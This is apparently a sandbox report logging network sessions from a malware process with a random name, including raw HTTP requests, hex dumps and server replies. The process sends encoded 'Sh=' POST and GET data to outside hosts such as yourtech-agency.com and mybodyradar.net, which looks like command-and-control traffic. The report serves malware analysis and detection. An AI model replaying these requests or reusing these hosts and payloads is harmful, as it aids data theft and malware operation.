                                                                                                        Data Ascii: Sh=Cr0AeZ3dkZy4DIFa4uiRrLH7WZhzn3JZrRU+nbeDfZ2fAe2Wxau07kmN1UvEx6WMjJQ1wZLNpfToWka0jytA8vSsyMrkywmTvWfphovjToh/AmNlEr2Ryq3pgQMN8/25U4z1UmzB8bAXCfc1V1mxieBixS6W5PgvILX30tdqfC7hZZ+2MkU6J7uQ135XF0o8TZOeh5zZ5hPpyo21TPgGIy+wA6U4yEac9Gq1682DZtLUXHVTPKX9bnm55qZFnDn7jr1x6OVH7M5AOUtnBZ8Uq559XWZFKcCN9GfVwLT1Y3fS6Yg/ce0xmj5fTUGdt3lWfCj0MxYU/Z3FtyQdzgU447oz06p1Eh/52oSkrrAolAp8jLBe3XESdSTT0v9YKg5jrxIvDanXmaGqWDa5mJLDy8jEUm8nhjNriVvmf1On0hD2EbDqQofosCqE7PiS460kCy5Fwyv5pNzlJMKg5SvPdZduq/eC9Tl4Uk7mfwqUrp6i2camEfseku1kanyj9ZsShzaon4CDT0NSYTB+uhHHOFAJZN4BxGar/14MgHbQmJ0dJxQSoZai9o2EFNkjjvjeM0+GMg39HGySe3kbzSEGHYlDuN7JPUsE7GfpPBTekxNLnqt85TOudNsVowtd/vmvuw5+8dywdaipnwuovxZD4esJ46fG5Tjlgp0hque9bWdaoUIUAxw9siuSigS0pfpMffInywwQn9kJ2g/7EI7U/PZFca+mCvzjRj/Y/ISi5xrOvEJMzjhYZQf+lyovOFP3GJR1V+d8EmpMexKSO3nX1kWxMaM47f7x+nqFf57SbGpQGq4FGTS/IDm7eu0mWd7XnUyOCxdoAYPu0xO5w1jbpQf+EMdzji+i6NdwvvP6KgSkzd0scpl6wNaRNc4whHXIshY6A851xOpEjOAS4tk6/SruAqbX3CrqtGcFp1vuA/AnKf1ZvNkcfDTH2w8nqJtv5CqpzWpqpmOg6iAt71nmuxPmpFJdf5HUXbUVS9+uk+V/wjXmg [TRUNCATED]


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        28192.168.2.45003284.32.84.32805856C:\Program Files (x86)\GgYqMgcqoXPMXvtyiyEZaESyRKxvUmwsKaYTNWNknbnRFLfF\XFLTednCZUTqje.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        Oct 10, 2024 14:47:51.237350941 CEST486OUTGET /wzoz/?Sh=Ppcgdv6DrtqpILZ3xPy0g9msApc+gUIN/EMWlKKGCKnUGKGSiYq02Q3K9hPbzriSr907/cLUuPH0KiO46gsbjuqN2MfoymjOpxTW14iCTowXcyBnLNm1v4w=&f6SpQ=_n84nZ4HGta HTTP/1.1
                                                                                                        Host: www.ainude2.cloud
                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        Connection: close
                                                                                                        User-Agent: Mozilla/5.0 (X11; Linux armv7l) AppleWebKit/537.42 (KHTML, like Gecko) Chromium/25.0.1349.2 Chrome/25.0.1349.2 Safari/537.42
                                                                                                        Oct 10, 2024 14:47:51.684149981 CEST1236INHTTP/1.1 200 OK
                                                                                                        Server: hcdn
                                                                                                        Date: Thu, 10 Oct 2024 12:47:51 GMT
                                                                                                        Content-Type: text/html
                                                                                                        Content-Length: 10072
                                                                                                        Connection: close
                                                                                                        Vary: Accept-Encoding
                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                        x-hcdn-request-id: 17bfed56805bac1693ceacd8d2b2f948-bos-edge4
                                                                                                        Expires: Thu, 10 Oct 2024 12:47:50 GMT
                                                                                                        Cache-Control: no-cache
                                                                                                        Accept-Ranges: bytes
                                                                                                        Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 74 69 74 6c 65 3e 50 61 72 6b 65 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 20 6f 6e 20 48 6f 73 74 69 6e 67 65 72 20 44 4e 53 20 73 79 73 74 65 6d 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 68 74 74 70 2d 65 71 75 69 76 3d 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 50 61 72 6b 65 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 20 6f 6e 20 48 6f 73 74 69 6e 67 65 72 20 44 4e 53 20 73 79 73 74 65 6d 22 20 6e 61 6d 65 3d 64 65 73 63 72 69 70 74 69 6f 6e 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 68 74 74 70 73 3a 2f 2f 6d 61 78 63 64 6e 2e 62 6f 6f 74 73 74 72 61 70 63 64 6e 2e 63 6f 6d 2f 62 6f [TRUNCATED]
                                                                                                        Data Ascii: <!doctype html><title>Parked Domain name on Hostinger DNS system</title><meta charset=utf-8><meta content="IE=edge,chrome=1" http-equiv=X-UA-Compatible><meta content="Parked Domain name on Hostinger DNS system" name=description><meta content="width=device-width,initial-scale=1" name=viewport><link href=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css rel=stylesheet><script src=https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js></script><script src=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js></script><link href=https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.3/css/all.min.css rel=stylesheet><link href="https://fonts.googleapis.com/css?family=Open+Sans:300,300i,400,400i,600,600i,700,700i,800,800i&subset=cyrillic,cyrillic-ext,greek,greek-ext,latin-ext,vietnamese" rel=stylesheet><style>html{height:100%}body{font-family:"
                                                                                                        Oct 10, 2024 14:47:51.684226036 CEST1236INData Raw: 4f 70 65 6e 20 53 61 6e 73 22 2c 48 65 6c 76 65 74 69 63 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 30 30 30 3b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 34 32 38 3b 62 61
                                                                                                        Data Ascii: Open Sans",Helvetica,sans-serif;color:#000;padding:0;margin:0;line-height:1.428;background:linear-gradient(10.7deg,#e9edfb -50.21%,#f6f8fd 31.11%,#fff 166.02%)}h1,h2,h3,h4,h5,h6,p{padding:0;margin:0;color:#333}h1{font-size:30px;font-weight:600
                                                                                                        Oct 10, 2024 14:47:51.684263945 CEST448INData Raw: 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 35 70 78 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 35 70 78 7d 2e 6e 61 76 62 61 72 2d 6e 61 76 3e 6c 69 3e 61 3a 68 6f 76 65 72 7b 74 65 78 74 2d 64 65
                                                                                                        Data Ascii: x;font-size:13px;padding-left:5px;padding-right:5px}.navbar-nav>li>a:hover{text-decoration:none;color:#cdc3ea!important}.navbar-nav>li>a i{margin-right:5px}.nav-bar img{position:relative;top:3px}.congratz{margin:0 auto;text-align:center}.top-c
                                                                                                        Oct 10, 2024 14:47:51.684320927 CEST1236INData Raw: 65 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 35 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 7d 2e 6d 65 73 73 61 67 65 20 70 7b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 6c 69
                                                                                                        Data Ascii: e;border-radius:5px;position:relative}.message p{font-weight:400;font-size:14px;line-height:24px}#pathName{color:#2f1c6a;font-weight:700;overflow-wrap:break-word;font-size:40px;line-height:48px;margin-bottom:16px}.section-title{color:#2f1c6a;f
                                                                                                        Oct 10, 2024 14:47:51.684364080 CEST1236INData Raw: 78 7d 2e 6e 61 76 62 61 72 2d 6c 69 6e 6b 73 7b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e 3b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 7d 2e 6e 61 76 62 61 72 2d 6c 69 6e 6b
                                                                                                        Data Ascii: x}.navbar-links{display:flex;flex-direction:column;align-items:center}.navbar-links>li{margin:0}.top-container{flex-direction:column-reverse}}</style><script src="https://www.googletagmanager.com/gtag/js?id=UA-26575989-44" async></script><scri
                                                                                                        Oct 10, 2024 14:47:51.684396029 CEST1236INData Raw: 73 3a 2f 2f 77 77 77 2e 68 6f 73 74 69 6e 67 65 72 2e 63 6f 6d 2f 61 66 66 69 6c 69 61 74 65 73 20 72 65 6c 3d 6e 6f 66 6f 6c 6c 6f 77 3e 3c 69 20 61 72 69 61 2d 68 69 64 64 65 6e 3d 74 72 75 65 20 63 6c 61 73 73 3d 22 66 61 73 20 66 61 2d 75 73
                                                                                                        Data Ascii: s://www.hostinger.com/affiliates rel=nofollow><i aria-hidden=true class="fas fa-users"></i> Affiliates</a></li><li><a href=https://hpanel.hostinger.com/login rel=nofollow><i aria-hidden=true class="fas fa-sign-in-alt"></i> Login</a></li></ul><
                                                                                                        Oct 10, 2024 14:47:51.684429884 CEST1236INData Raw: 77 72 61 70 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 63 6f 6c 75 6d 6e 2d 63 75 73 74 6f 6d 3e 3c 64 69 76 20 63 6c 61 73 73 3d 63 6f 6c 75 6d 6e 2d 74 69 74 6c 65 3e 41 64 64 20 77 65 62 73 69 74 65 20 74 6f 20 79 6f 75 72 20 68 6f 73 74 69 6e 67
                                                                                                        Data Ascii: wrap"><div class=column-custom><div class=column-title>Add website to your hosting</div><br><p>Add your website to any of your hosting plans. Follow the article below to add your domain at Hostinger.</p><br><a href=https://support.hostinger.co
                                                                                                        Oct 10, 2024 14:47:51.684462070 CEST328INData Raw: 33 36 2c 65 2e 70 75 73 68 28 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 72 3e 3e 3e 31 30 26 31 30 32 33 7c 35 35 32 39 36 29 29 2c 72 3d 35 36 33 32 30 7c 31 30 32 33 26 72 29 2c 65 2e 70 75 73 68 28 53 74 72 69 6e 67 2e 66 72
                                                                                                        Data Ascii: 36,e.push(String.fromCharCode(r>>>10&1023|55296)),r=56320|1023&r),e.push(String.fromCharCode(r))}return e.join("")}};var o=36,r=2147483647;function e(o,r){return o+22+75*(o<26)-((0!=r)<<5)}function n(r,e,n){var t;for(r=n?Math.floor(r/700):r>>1
                                                                                                        Oct 10, 2024 14:47:51.684494972 CEST1236INData Raw: 29 7d 74 68 69 73 2e 64 65 63 6f 64 65 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 61 2c 68 2c 66 2c 69 2c 63 2c 75 2c 64 2c 6c 2c 70 2c 67 2c 73 2c 43 2c 77 2c 76 2c 6d 3d 5b 5d 2c 79 3d 5b 5d 2c 45 3d 65 2e 6c 65 6e 67 74 68 3b 66
                                                                                                        Data Ascii: )}this.decode=function(e,t){var a,h,f,i,c,u,d,l,p,g,s,C,w,v,m=[],y=[],E=e.length;for(a=128,f=0,i=72,(c=e.lastIndexOf("-"))<0&&(c=0),u=0;u<c;++u){if(t&&(y[m.length]=e.charCodeAt(u)-65<26),128<=e.charCodeAt(u))throw new RangeError("Illegal input
                                                                                                        Oct 10, 2024 14:47:51.684526920 CEST984INData Raw: 28 6d 2d 39 37 3c 32 36 29 3c 3c 35 29 2b 28 28 21 77 5b 64 5d 26 26 6d 2d 36 35 3c 32 36 29 3c 3c 35 29 29 3a 74 5b 64 5d 29 29 3b 66 6f 72 28 69 3d 63 3d 79 2e 6c 65 6e 67 74 68 2c 30 3c 63 26 26 79 2e 70 75 73 68 28 22 2d 22 29 3b 69 3c 76 3b
                                                                                                        Data Ascii: (m-97<26)<<5)+((!w[d]&&m-65<26)<<5)):t[d]));for(i=c=y.length,0<c&&y.push("-");i<v;){for(l=r,d=0;d<v;++d)h<=(C=t[d])&&C<l&&(l=C);if(l-h>Math.floor((r-f)/(i+1)))throw RangeError("punycode_overflow (1)");for(f+=(l-h)*(i+1),h=l,d=0;d<v;++d){if((C=


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        29192.168.2.450033109.234.166.180805856C:\Program Files (x86)\GgYqMgcqoXPMXvtyiyEZaESyRKxvUmwsKaYTNWNknbnRFLfF\XFLTednCZUTqje.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        Oct 10, 2024 14:47:56.819595098 CEST769OUTPOST /99um/ HTTP/1.1
                                                                                                        Host: www.yourtech-agency.com
                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        Origin: http://www.yourtech-agency.com
                                                                                                        Cache-Control: max-age=0
                                                                                                        Content-Length: 199
                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                        Connection: close
                                                                                                        Referer: http://www.yourtech-agency.com/99um/
                                                                                                        User-Agent: Mozilla/5.0 (X11; Linux armv7l) AppleWebKit/537.42 (KHTML, like Gecko) Chromium/25.0.1349.2 Chrome/25.0.1349.2 Safari/537.42
                                                                                                        Data Raw: 53 68 3d 68 63 4c 4c 43 61 76 4c 6a 30 6a 2b 44 34 74 76 53 31 51 51 55 65 70 61 75 4f 49 43 78 2f 33 53 41 47 73 67 74 45 4d 63 45 67 32 6d 42 68 6c 38 59 51 62 32 5a 57 43 32 33 44 77 39 73 33 6d 59 69 70 6d 6c 33 42 79 6a 37 4d 37 42 37 65 53 74 77 2f 76 73 43 30 7a 4e 47 4b 65 33 7a 2b 64 67 4a 34 4d 55 72 6d 68 76 6f 4c 31 30 56 32 69 5a 2b 52 63 54 4e 47 4d 43 72 36 77 75 61 69 71 54 58 5a 76 63 44 59 45 61 35 77 6f 48 47 53 2f 70 6c 45 55 54 48 4c 55 69 71 65 35 68 43 6c 41 2f 55 4d 76 35 69 46 4e 5a 45 2b 4b 62 4b 47 37 65 61 64 65 50 4b 6f 56 73 46 68 32 31 61 67 39 7a 69 41 3d 3d
                                                                                                        Data Ascii: Sh=hcLLCavLj0j+D4tvS1QQUepauOICx/3SAGsgtEMcEg2mBhl8YQb2ZWC23Dw9s3mYipml3Byj7M7B7eStw/vsC0zNGKe3z+dgJ4MUrmhvoL10V2iZ+RcTNGMCr6wuaiqTXZvcDYEa5woHGS/plEUTHLUiqe5hClA/UMv5iFNZE+KbKG7eadePKoVsFh21ag9ziA==
                                                                                                        Oct 10, 2024 14:47:57.431843042 CEST672INHTTP/1.1 307 Temporary Redirect
                                                                                                        Date: Thu, 10 Oct 2024 12:47:56 GMT
                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                        Transfer-Encoding: chunked
                                                                                                        Connection: close
                                                                                                        cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                        expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                        referer-policy: same-origin
                                                                                                        set-cookie: o2s-chl=6f46695530e53f853ddf7fd7ae2c44af; domain=.yourtech-agency.com; expires=Fri, 11-Oct-24 12:47:56 GMT; path=/; SameSite=Lax; HttpOnly
                                                                                                        location: http://www.yourtech-agency.com/99um/
                                                                                                        tiger-protect-security: https://faq.o2switch.fr/hebergement-mutualise/tutoriels-cpanel/tiger-protect
                                                                                                        Server: o2switch-PowerBoost-v3
                                                                                                        Data Raw: 31 0d 0a 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                        Data Ascii: 10


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        30192.168.2.450034109.234.166.180805856C:\Program Files (x86)\GgYqMgcqoXPMXvtyiyEZaESyRKxvUmwsKaYTNWNknbnRFLfF\XFLTednCZUTqje.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        Oct 10, 2024 14:47:59.374453068 CEST789OUTPOST /99um/ HTTP/1.1
                                                                                                        Host: www.yourtech-agency.com
                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        Origin: http://www.yourtech-agency.com
                                                                                                        Cache-Control: max-age=0
                                                                                                        Content-Length: 219
                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                        Connection: close
                                                                                                        Referer: http://www.yourtech-agency.com/99um/
                                                                                                        User-Agent: Mozilla/5.0 (X11; Linux armv7l) AppleWebKit/537.42 (KHTML, like Gecko) Chromium/25.0.1349.2 Chrome/25.0.1349.2 Safari/537.42
                                                                                                        Data Raw: 53 68 3d 68 63 4c 4c 43 61 76 4c 6a 30 6a 2b 44 59 78 76 58 53 38 51 53 2b 70 5a 74 4f 49 43 37 66 33 65 41 47 77 67 74 41 39 5a 46 57 75 6d 59 41 35 38 5a 52 62 32 59 57 43 32 38 6a 77 30 6a 58 6d 52 69 70 61 62 33 41 4f 6a 37 4d 2f 42 37 65 43 74 77 4d 58 74 51 55 7a 44 4f 71 65 78 33 2b 64 67 4a 34 4d 55 72 69 4a 56 6f 4b 52 30 55 47 79 5a 76 44 30 53 54 32 4d 46 69 61 77 75 51 43 71 58 58 5a 75 35 44 5a 59 38 35 32 30 48 47 58 44 70 6c 51 41 51 51 62 55 6b 75 65 34 6f 45 30 5a 4c 51 66 57 43 6c 58 6b 36 4c 76 2b 45 4c 41 71 45 4c 73 2f 59 59 6f 78 66 59 6d 2f 42 58 6a 41 36 35 47 6a 6b 4d 33 4e 67 36 42 48 67 4c 48 48 68 51 57 44 32 57 34 51 3d
                                                                                                        Data Ascii: Sh=hcLLCavLj0j+DYxvXS8QS+pZtOIC7f3eAGwgtA9ZFWumYA58ZRb2YWC28jw0jXmRipab3AOj7M/B7eCtwMXtQUzDOqex3+dgJ4MUriJVoKR0UGyZvD0ST2MFiawuQCqXXZu5DZY8520HGXDplQAQQbUkue4oE0ZLQfWClXk6Lv+ELAqELs/YYoxfYm/BXjA65GjkM3Ng6BHgLHHhQWD2W4Q=
                                                                                                        Oct 10, 2024 14:47:59.962954044 CEST672INHTTP/1.1 307 Temporary Redirect
                                                                                                        Date: Thu, 10 Oct 2024 12:47:58 GMT
                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                        Transfer-Encoding: chunked
                                                                                                        Connection: close
                                                                                                        cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                        expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                        referer-policy: same-origin
                                                                                                        set-cookie: o2s-chl=6f46695530e53f853ddf7fd7ae2c44af; domain=.yourtech-agency.com; expires=Fri, 11-Oct-24 12:47:58 GMT; path=/; SameSite=Lax; HttpOnly
                                                                                                        location: http://www.yourtech-agency.com/99um/
                                                                                                        tiger-protect-security: https://faq.o2switch.fr/hebergement-mutualise/tutoriels-cpanel/tiger-protect
                                                                                                        Server: o2switch-PowerBoost-v3
                                                                                                        Data Raw: 31 0d 0a 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                        Data Ascii: 10


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        31192.168.2.450035109.234.166.180805856C:\Program Files (x86)\GgYqMgcqoXPMXvtyiyEZaESyRKxvUmwsKaYTNWNknbnRFLfF\XFLTednCZUTqje.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        Oct 10, 2024 14:48:01.973875999 CEST10871OUTPOST /99um/ HTTP/1.1
                                                                                                        Host: www.yourtech-agency.com
                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        Origin: http://www.yourtech-agency.com
                                                                                                        Cache-Control: max-age=0
                                                                                                        Content-Length: 10299
                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                        Connection: close
                                                                                                        Referer: http://www.yourtech-agency.com/99um/
                                                                                                        User-Agent: Mozilla/5.0 (X11; Linux armv7l) AppleWebKit/537.42 (KHTML, like Gecko) Chromium/25.0.1349.2 Chrome/25.0.1349.2 Safari/537.42
                                                                                                        Data Raw: 53 68 3d 68 63 4c 4c 43 61 76 4c 6a 30 6a 2b 44 59 78 76 58 53 38 51 53 2b 70 5a 74 4f 49 43 37 66 33 65 41 47 77 67 74 41 39 5a 46 57 57 6d 45 69 64 38 59 79 7a 32 43 57 43 32 69 54 77 35 6a 58 6e 44 69 74 33 63 33 41 43 64 37 4f 33 42 36 34 4f 74 68 70 37 74 62 55 7a 44 43 4b 65 77 7a 2b 64 50 4a 38 67 51 72 6d 74 56 6f 4b 52 30 55 45 36 5a 76 52 63 53 52 32 4d 43 72 36 77 69 61 69 71 2f 58 5a 32 50 44 59 73 7a 2b 41 45 48 47 7a 66 70 67 6a 6f 51 50 72 55 6d 67 2b 34 77 45 30 6c 55 51 66 4c 35 6c 58 39 56 4c 76 4b 45 4a 55 32 54 51 4d 2f 59 42 59 77 5a 46 56 50 6c 5a 45 67 55 35 6b 50 6d 46 79 49 2b 6b 78 58 66 46 77 32 30 55 58 43 31 53 39 75 34 41 62 58 6b 61 72 38 47 4f 43 63 5a 54 36 4b 6e 2b 68 6e 66 6c 44 79 78 47 74 37 2b 64 41 30 7a 47 35 5a 2b 67 6c 75 36 34 6e 63 76 4d 51 4d 66 43 68 70 4b 64 4b 39 42 2b 64 46 2b 75 52 35 72 62 72 76 33 4e 4a 2b 64 52 54 35 45 37 64 37 62 39 66 49 43 48 4b 44 73 72 6f 52 63 77 77 43 48 65 77 6b 78 77 7a 4d 56 34 66 63 6b 67 61 6d 7a 4e 2f 66 39 42 52 68 [TRUNCATED]
                                                                                                        Data Ascii: Sh=hcLLCavLj0j+DYxvXS8QS+pZtOIC7f3eAGwgtA9ZFWWmEid8Yyz2CWC2iTw5jXnDit3c3ACd7O3B64Othp7tbUzDCKewz+dPJ8gQrmtVoKR0UE6ZvRcSR2MCr6wiaiq/XZ2PDYsz+AEHGzfpgjoQPrUmg+4wE0lUQfL5lX9VLvKEJU2TQM/YBYwZFVPlZEgU5kPmFyI+kxXfFw20UXC1S9u4AbXkar8GOCcZT6Kn+hnflDyxGt7+dA0zG5Z+glu64ncvMQMfChpKdK9B+dF+uR5rbrv3NJ+dRT5E7d7b9fICHKDsroRcwwCHewkxwzMV4fckgamzN/f9BRhoAqCv5dxLlNd7sHk98DRk5ulS/rlHLDfbtg+62OGulhv4vi/t0i+gun+rXtyByqshfFv8wmO+lH7fMq7xr9iWenGkANJ0C3OH37uIAo8U6XSb+IDiBreOS6etHt+4d54U9AivRHlLE9piMMR/M/MaX510dW84nKqZnN9Q4nR3bDcIFqY8a76ScmjgaaDaKCpCZ9YyK5A7xLHijgdNQbClzjdeVCwge+dy/nIRaek3ioS79IczJqQf9Xv5ku5RsHhWhVeQIN0Oq8OJv32hOvVkFcLqyoa0vbuuJzBaeY15mHEr0kvLy3IKn2kpDEI9FPnuT7OZTb3Akc744aFDIqyQw8erdDqGWtPVA2S2gH3L3KvqOrSCzEw6i2AJJN8189VXTh+8eqUdh+V4+whgyu2UZZ3uwbBzhp8V2sq/0hMCgwMIVgDyCpMUzm3Hwmj+5Vb0w/1ZTXcsYHYWi0karv38xIFw454+vTsbftkUrHGmh8KPcsARzH6pAyB1nnLqnfAW8w2zoNi2CtYvTCL03nfsp2diOqLHrXk82ST+5VZHTlmmoyrjM1J89bHw9iihS1vdTSPyoQHzlsz6wKDEe0Lv2i5hu3q7ML/a2uhr3sEbHvogVkT+NY85ftWHRT74vAZ5KOg6M5SMUhhaZWbD4rSovtBsy7m72DIYg [TRUNCATED]
                                                                                                        Oct 10, 2024 14:48:02.585396051 CEST672INHTTP/1.1 307 Temporary Redirect
                                                                                                        Date: Thu, 10 Oct 2024 12:48:01 GMT
                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                        Transfer-Encoding: chunked
                                                                                                        Connection: close
                                                                                                        cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                        expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                        referer-policy: same-origin
                                                                                                        set-cookie: o2s-chl=6f46695530e53f853ddf7fd7ae2c44af; domain=.yourtech-agency.com; expires=Fri, 11-Oct-24 12:48:01 GMT; path=/; SameSite=Lax; HttpOnly
                                                                                                        location: http://www.yourtech-agency.com/99um/
                                                                                                        tiger-protect-security: https://faq.o2switch.fr/hebergement-mutualise/tutoriels-cpanel/tiger-protect
                                                                                                        Server: o2switch-PowerBoost-v3
                                                                                                        Data Raw: 31 0d 0a 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                        Data Ascii: 10


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        32192.168.2.450036109.234.166.180805856C:\Program Files (x86)\GgYqMgcqoXPMXvtyiyEZaESyRKxvUmwsKaYTNWNknbnRFLfF\XFLTednCZUTqje.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        Oct 10, 2024 14:48:04.515564919 CEST492OUTGET /99um/?f6SpQ=_n84nZ4HGta&Sh=sejrBqbnhxLzIpZobXocfoJh7+Ax68vpI3pksmQcQlCqcURGXTbbLy2S/SU0nQLTr9eIuSCZyPnks+fy4cbgfRvRA7W8zuFue70e+ik0nvs8B1GRgQpORnQ= HTTP/1.1
                                                                                                        Host: www.yourtech-agency.com
                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        Connection: close
                                                                                                        User-Agent: Mozilla/5.0 (X11; Linux armv7l) AppleWebKit/537.42 (KHTML, like Gecko) Chromium/25.0.1349.2 Chrome/25.0.1349.2 Safari/537.42
                                                                                                        Oct 10, 2024 14:48:05.335777044 CEST486INHTTP/1.1 301 Moved Permanently
                                                                                                        Date: Thu, 10 Oct 2024 12:48:04 GMT
                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                        Content-Length: 0
                                                                                                        Connection: close
                                                                                                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                        Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                        X-Redirect-By: WordPress
                                                                                                        Location: http://yourtech-agency.com/99um/?f6SpQ=_n84nZ4HGta&Sh=sejrBqbnhxLzIpZobXocfoJh7+Ax68vpI3pksmQcQlCqcURGXTbbLy2S/SU0nQLTr9eIuSCZyPnks+fy4cbgfRvRA7W8zuFue70e+ik0nvs8B1GRgQpORnQ=
                                                                                                        Server: o2switch-PowerBoost-v3


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        33192.168.2.4500373.33.130.190805856C:\Program Files (x86)\GgYqMgcqoXPMXvtyiyEZaESyRKxvUmwsKaYTNWNknbnRFLfF\XFLTednCZUTqje.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        Oct 10, 2024 14:48:10.430226088 CEST757OUTPOST /qyz6/ HTTP/1.1
                                                                                                        Host: www.mybodyradar.net
                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        Origin: http://www.mybodyradar.net
                                                                                                        Cache-Control: max-age=0
                                                                                                        Content-Length: 199
                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                        Connection: close
                                                                                                        Referer: http://www.mybodyradar.net/qyz6/
                                                                                                        User-Agent: Mozilla/5.0 (X11; Linux armv7l) AppleWebKit/537.42 (KHTML, like Gecko) Chromium/25.0.1349.2 Chrome/25.0.1349.2 Safari/537.42
                                                                                                        Data Raw: 53 68 3d 52 4d 58 32 59 77 4b 39 59 42 74 55 69 54 4f 56 32 39 31 32 66 65 6c 68 46 72 6d 5a 33 35 50 5a 68 43 32 36 47 63 68 70 36 31 37 4a 4c 44 55 62 4f 70 6e 6f 56 43 71 77 46 74 48 75 62 74 45 65 4c 2b 4c 69 34 37 41 51 55 64 77 32 6c 54 75 67 57 6f 55 6a 30 52 56 35 52 65 66 6c 36 62 6a 33 69 30 52 74 5a 63 35 75 4f 55 49 2f 2f 78 6b 48 65 68 44 61 4d 43 48 4d 64 41 31 78 76 51 42 30 7a 4b 75 31 63 79 63 43 50 79 66 70 6d 6d 5a 30 6a 64 47 66 32 66 48 65 33 4b 43 51 67 55 72 72 47 45 63 5a 77 6d 6b 70 69 54 30 45 2b 66 66 30 2b 47 49 54 4a 51 48 30 39 35 48 74 49 32 70 49 46 67 3d 3d
